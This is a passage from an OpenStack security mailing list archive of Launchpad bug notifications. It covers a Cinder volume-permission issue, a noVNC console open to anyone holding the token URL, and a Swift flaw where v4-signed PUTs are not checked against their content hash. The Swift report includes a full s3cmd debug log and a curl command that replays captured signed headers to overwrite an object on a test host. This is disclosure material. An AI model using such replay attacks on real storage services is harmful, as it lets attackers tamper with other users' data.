'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From guojy8993 at 163.com Tue Nov 26 01:27:32 2019 From: guojy8993 at 163.com (pandatt) Date: Tue, 26 Nov 2019 01:27:32 -0000 Subject: [Openstack-security] [Bug 1447679] Re: service No-VNC (port 6080) doesn't require authentication References: <20150423154044.13260.70404.malonedeb@chaenomeles.canonical.com> Message-ID: <157473165244.21773.6160864257433818153.malone@soybean.canonical.com> https://review.opendev.org/#/c/623120/ https://review.opendev.org/#/c/622336/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1447679 Title: service No-VNC (port 6080) doesn't require authentication Status in OpenStack Compute (nova): Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: Reported via private E-mail from Anass ANNOUR: I found that the service No-VNC (port 6080) doesn't require authentication, if you know the URL (ex: http://192.168.198.164:6080/vnc_auto.html?token=3640a3c8-ad10-45da-a523-18d3793ef8ec) you can access the machine from any other computer without any authentication before the token expires. (or in the same time as user still use the console) To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1447679/+subscriptions From 1765834 at bugs.launchpad.net Tue Nov 26 14:28:23 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 26 Nov 2019 14:28:23 -0000 Subject: [Openstack-security] [Bug 1765834] Fix included in openstack/swift 2.19.2 References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <157477850344.31668.12956333870865397306.malone@wampee.canonical.com> This issue was fixed in the openstack/swift 2.19.2 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions